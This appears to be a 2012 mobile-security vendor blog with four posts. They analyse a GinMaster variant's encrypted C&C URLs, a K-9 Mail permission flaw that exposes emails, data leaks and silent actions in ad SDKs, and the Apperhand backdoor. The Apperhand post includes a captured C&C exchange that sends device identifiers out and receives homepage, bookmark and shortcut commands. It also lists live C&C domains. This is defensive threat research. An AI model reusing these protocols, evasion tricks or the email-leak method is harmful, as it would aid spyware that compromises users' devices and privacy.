TrustGo

On the Verge of Polymorphic Mobile Malware?
—— A new variant of GinMaster found in the wild.

February 22, 2012 By TrustGo Security Labs

Yesterday (2/21/2012), TrustGo Security Labs uncovered a significant evolution of the notorious GinMaster malware. Our tests indicate the new variant of GinMaster can successfully evade detection by all the leading mobile anti-virus software, much like the situation when it was first discovered. Our investigation has revealed that this new variant of GinMaster has been injected into over 100 legitimate apps, which are then distributed on alternative Android markets.

TrustGo has named this new variation GinMaster.d.Trojan.Android.

GinMaster was first found by researchers from North Carolina State University on 8/17/2011. It is the first malware to utilize a rooting exploit that targets Android 2.3.3 (Gingerbread) devices, allowing escalation of privileges on the system. Once this exploit has been exercised successfully, GinMaster may install additional applications to the device without the user's consent.

The most impressive feature of the original GinMaster is the extreme length it goes to in order to evade being detected by anti-virus software. For example, it obfuscates the class name for each infected object (see Figure 1). It is impossible to catch GinMaster by detecting the full class name.

Figure 1: Obfuscated class name

GinMaster also changes the URL address of its Command and Control (C&C) server to avoid detection. We have seen at least 3 C&C servers used by this malware:

	http://client.mustmobile.com
	http://client.139vps.com
	http://client.go360days.com

The new variant of GinMaster we’ve discovered takes the above a step further; it actually encrypts these URLs!

Figure 2 shows the encrypted string. It will be decrypted at runtime with the simple password 0x18 in Figure 3. We can see that the decrypted string is the C&C server’s URL address:

http://client.go360days.com/report/open_table.do

Figure 2: Encrypted string

Figure 3: Decrypt method

In the world of traditional PC viruses, polymorphic malware attempts to evade detection by encrypting itself differently, and rewriting the decrypting module accordingly. The newest variant of GinMaster now uses encryption as well, but the decrypting module is still static. It’s not a far stretch to suggest that GinMaster or another new malware could use a different cipher code for each decrypting module. With a dynamic cipher code, these pieces of software would effectively become the first known examples of polymorphic mobile malware.

Besides the added encryption, the new GinMaster variant also extends its ability to control the user’s screen. It adds “View” by WindowManagerServices and sets the window type to “Toast”. The toast window can show on top of other applications even when the user has already quit the malware (See Figure 5).

Upon clicking the toast window, GinMaster will download applications and prompt the user to install them.

Figure 4: Screen control

Figure 5: Toast Window

K-9 mail client is vulnerable to privacy leak

February 15, 2012 By TrustGo Security Labs

Application information

Vulnerability information

Abstract

K-9 is the most popular email client for Android. It is an open-source e-mail client with numerous features, including search, IMAP push email, multi-folder sync, flagging, filing, signatures, bcc-self, PGP, mail on SD, etc. It has been downloaded between 1 million and 5 million times from Google Android Market.

K-9 version 4.005 has a vulnerability wherein a user’s email may be exposed to other apps. A malicious app without any system permissions can easily exploit K-9’s vulnerability to collect all the user’s emails and leak them to an arbitrary website.

Details

A malicious app can obtains user’s email from K-9 without user’s consent.

K-9 claims ContainProvidercom.fsck.k9.provider.MessageProvider:

<provider
android:name="com.fsck.k9.provider.MessageProvider"
android:authorities="com.fsck.k9.messageprovider"
android:multiprocess="true"
android:grantUriPermissions="true"
android:readPermission="com.fsck.k9.permission.READ_MESSAGES"
android:writePermission="com.fsck.k9.permission.DELETE_MESSAGES"/>

K-9 claims permission “com.fsck.k9.permission.READ_MESSAGES” as:

<permission android:name="com.fsck.k9.permission.READ_MESSAGES"
android:permissionGroup="android.permission-group.MESSAGES"
android:protectionLevel="normal"
android:label="@string/read_messages_label"
android:description="@string/read_messages_desc"/>

Since permission “com.fsck.k9.permission.READ_MESSAGES” protection level is normal, any app can request this permission. Meanwhile, app has this permission can read emails in K-9 mail client.

Thus an app can get emails from K-9 by only claim permission “com.fsck.k9.permission.READ_MESSAGES”. Combined with INTERNET permission which is very common used, an app can easily leak user’s emails to certain websites. Even without INTERNET permission, an app can also leak user’s emails to internet by exploiting another feature of web browser on Android system.

This is very dangerous when users access business email with K-9 mail client.

Security of In-App Mobile Advertising

February 1, 2012 By TrustGo Security Labs

In-app mobile advertising grew explosively in the year 2011 as more and more mobile apps were developed, and it’s now projected to be at least a $2 billion industry. Just how popular is it? In Google’s Android Market, 50% of all free apps communicate with at least one mobile advertising network.

If we look at the alternative markets alone, the percentage is higher, with nearly two-thirds (61.4%) of apps containing mobile ads.

In-app mobile advertising indeed brings money to app developers, which easily explains the numbers above. For the user, beyond being a source of minor annoyance, it may also be a security and privacy risk.

We recently analyzed more than 100 in-app mobile advertising platforms on Android, and found that a large portion of advertising platforms have security, privacy and usability issues.

Here are some of the issues we identified:

Privacy leaks

Mobile advertising is a big threat to a user’s privacy. We observed that 88% of mobile advertising platforms leaked information--in clear text--that could be used to identify the user or device, such as the IMEI, IMSI, etc.

28% of the mobile advertising platforms leaked the user’s phone number; these platforms are currently embedded in about 36,000 Android apps worldwide, which have been downloaded more than 1.3 billion times in total.

Most of the advertising platforms send the user’s phone number to their website via an HTTP GET method when retrieving advertisements. Here is a URL used by one of the platforms for getting advertisements (phone number in red):

ad.xxxxxx.com/ad/?t=1&v=1.0&s=4&sv=1&uid=000000000000000&id=XNZDYYYY&tm=100&fm=100&m=sdk&loc=zh-CN&gps=0%2C0&bas=0&lac=0&imsi=310260000000000&sc=15555218135&w=320&h=50

Code snippet from another platform:

Some of them send the phone number in binary format via an HTTP POST method:

Installing apps without confirmation

Mobile advertisements are sometimes used for app promotion. When these ads are clicked, the user will be redirected to a download page, or an application will be downloaded automatically without clear notice.

30% of mobile advertising platform have this type of advertisement. Of those, 70% directly download an application package, instead of using Android Market. Downloading the application directly is a huge security risk. Since the app being downloaded is provided by an advertiser, instead of a trusted source, malicious advertisers can easily use this method to distribute malware. This technique has already been used by some malware, such as the “GGTracker”, which was discovered in June 2011.

Texting without confirmation

Fortunately, the practice of sending unsolicited text messages is not yet as widespread, though we still found some perpetrators. For example, one of the platforms provides a JavaScript file for the advertiser to embed in their web page. This JavaScript contains code to directly send a text message through the Android Java sendTextMessage() API.

JavaScript code:

Java code:

Since the web content is controlled by the advertiser, the advertiser is able to control whether a message is sent, as well as what’s included as message content.

Calling phones without confirmation

Some advertising platforms induce the user to make a phone call to the advertiser. These platforms make the calls in two different ways: by bringing up the system dialer UI, or by calling the number directly.

Among those platforms making phone calls directly, we found that only one of them makes phone calls without user confirmation, while all the others will show a dialog before the call is actually made.

Creating advertisement shortcuts on the desktop

Some applications add a shortcut linked to the advertiser’s website without the user’s awareness.

Writing text messages directly to the inbox

We found that one of the advertising platforms writes advertisements directly to the user’s SMS inbox, which tricks the user into thinking that he/she has just received a message from a trustworthy sender.

Notification ads

Some advertising platforms can push ads to the user’s phone, usually appearing in the notification bar. The push features are commonly implemented using an Android service. Once started, the service will be always running, even if the user exits the app. Some applications will even configure the service to start automatically at each system boot.

Malware Apperhand Found in Official Android Market

February 1, 2012 By TrustGo Security Labs

Summary

TrustGo has found more than 70 apps (see appendix 2) on Google’s official Android Market which are infected with the Apperhand.a.Backdoor.Android malware on 2012/1/12. This malicious code opens a backdoor to a remote command-and-control(C&C) server, in order to retrieve and perform commands.

TrustGo has reported this finding to Google Android Security Team on 2012/1/12.

Detailed Analysis

Apperhand.a.Backdoor.Android is a malicious application for Android phones. This malware contacts a remote C&C server and responds to a few hard-coded commands from that server, such as:

• homepage: sets a given URL as the browser homepage
• bookmarks: gets/sets a list of bookmarks in the phone's browser
• shortcuts: gets/sets a list of shortcuts on the phone's main application page
• notifications: pushes notification ads to the phone’s notification area

In our case, unwanted behavior initiated by Apperhand included:

1. Modified our browser homepage to the following URL:
   http://www.searchmobileonline.com/?sourceid=6&app=bg3ELZK%2FVVW4eFFdaD8qKARoih9CmK5ZfLxv4Ta%2FvI2vxAneCNgamcZxBXtWMfHi2c3yvRh1%2FCnH3N%2BnKvk91w%3D%3D
   When this URL is processed and the page opened (which happens as soon as the browser starts), the address shown is http://start.infospace.com
   This website has generated many complaints among mobile users, as evidenced by a simple Google query
   
2. Added two bookmarks to our default browser, according to content retrieved from the C&C server.
3. Created a shortcut on our home screen. Again, the C&C server was responsible for both the command to create the shortcut, as well as its content.
   
4. Displayed push notification ads in our phone’s notification tray.
5. Leaked following information to the C&C server:
   DeviceId, device brand, manufacturer, model, OS, versionRelease, versionSDKInt, displayMetrics:{density, densityDpi, heightPixels, scaledDensity, widthPixels, xdpi, ydpi}, locale, protocolVersion, sourceIp, userAgent

Evidence

The malicious code exists in com.apperhand.*

Figure 1: Source code of malware Apperhand

The following code shows the commands list, which is used to communicate with the C&C server. We found that the source code of Apperhandis very similar to a confirmed malware called Plankton, which was discovered by Prof. Xuxian Jiang in June 2011¹.

Figure 2: Source code of malware Plankton

A detailed sample of the communication sequence between Apperhand and the C&C server can be found in Appendix 1.

Appendix 1

The following table shows the communication between client and C&C server.

POST /ProtocolGW/protocol/commands HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D 
protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 689 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"initiationType": "first time", "needSpecificParameters":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

HTTP/1.1 200 OK 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:27 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 208 
Connection: keep-alive   
{"commands": [{"id": "fabcc997-0f84-4cd2-acbe-6325943159b9", "parameters":null, "command": "ACTIVATION"}], "commandsInterval":15, "parameters": {}, "abTest": "3742aa6a-7a72-4fd9-abce-7ef86c2023dd", "validResponse":true}

POST /ProtocolGW/protocol/activate HTTP/1.1 
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 690 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"missingParameters": ["ACTIVATED"], "firstTimeActivation":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

 
HTTP/1.1 200 OK 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:31 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 307 
Connection: keep-alive  
{"activation": {"parameters": {"SEARCH_URL": "http://www.searchmobileonline.com/{$CATEGORY$}?sourceid=7&app=V%2Bd%2FMs1MPLlT3I%2BxWFt0Yw4se4pJuTbM%2FGuC3fwHdmXFRBCquOUB5HXylUtrvc5aUBNR2%2BL8FLNREKwHglltKA%3D%3D&q={$QUERY$}"}, "eula": "http://wwww.our-ula.com"}, "parameters": {}, "abTest":null, "validResponse":true}

POST /ProtocolGW/protocol/commandstatus HTTP/1.1 
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 820 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"statuses": [{"message": "com.custom.lwp.AHDRedHeartOnRedSea was activated, SABABA!!!", "status": "SUCCESS", "command": "ACTIVATION", "id": "fabcc997-0f84-4cd2-acbe-6325943159b9", "parameters":null}], "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

HTTP/1.1 200 OK 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:38 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 77 
Connection: keep-alive  
{"nextCommandInterval":15, "abTest":null, "validResponse":true, "parameters": {}}

 
POST /ProtocolGW/protocol/shortcuts HTTP/1.1 
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 652 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"supportLauncher":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

 
HTTP/1.1 200 OK 
Content-Encoding: gzip 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:05 GMT 
Server: Apache-Coyote/1.1 
Vary: Accept-Encoding 
Vary: Accept-Encoding 
Content-Length: 6362 
Connection: keep-alive  
"shortcutList" 
"icon": [truncated] 
"screen": -1 
"name": Search 
"id": -1 
"link": http://www.searchmobileonline.com/?sourceid=0&app=Iw0P44FnTv4zoHdY1ViwWIf%2Blod209JmBBv3Seu7myCASqK6jjaRh%2B2aBsUBSJ%2BbHyMG1STlZ3JA9O64e8cwXw%3D%3D
"status": ADD 

POST /ProtocolGW/protocol/bookmarks HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 629 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

 
HTTP/1.1 200 OK 
Content-Encoding: gzip 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:17 GMT 
Server: Apache-Coyote/1.1 
Vary: Accept-Encoding 
Vary: Accept-Encoding transfer-encoding: chunked 
Connection: keep-alive  
"bookmarks" 
"id": -1 
"status": ADD 
"title": Search 
"url":  http://www.searchmobileonline.com/?sourceid=1&app=FrX8LTKgLzLAkj%2FAspG%2F2cARpr1nY4AHilQegP7guyuPG4UtsT2wPXAl%2FT8NN9jwKIWJh%2BDKEWE%2FE6lyzGBZ7w%3D%3D 
"favicon": [truncated]  
"id": -1 
"status": ADD 
"title": Search the web 
"url":  http://www.searchmobileonline.com/?sourceid=2&app=9B4zOudgt3E%2FB7iF07ahpdqiolJg2jy5dfktzdCslaPOF6By%2B6vHeu73oh66fRU3myk0P3BNtuMcuHgyF9Nn8Q%3D%3D
"favicon": [truncated]

POST /ProtocolGW/protocol/homepage HTTP/1.1 
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D protocol-version: 1.0.6 User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 629 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 

 
HTTP/1.1 200 OK
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:29 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 228 
Connection: keep-alive  
{"homepage": {"pageURL": "http://www.searchmobileonline.com/?sourceid=6&app=bg3ELZK%2FVVW4eFFdaD8qKARoih9CmK5ZfLxv4Ta%2FvI2vxAneCNgamcZxBXtWMfHi2c3yvRh1%2FCnH3N%2BnKvk91w%3D%3D"}, "abTest":null, "validResponse":true, "parameters": {}} 

Appendix 2

Here is a list of 70 infected apps on Android Market as of 2012/1/12: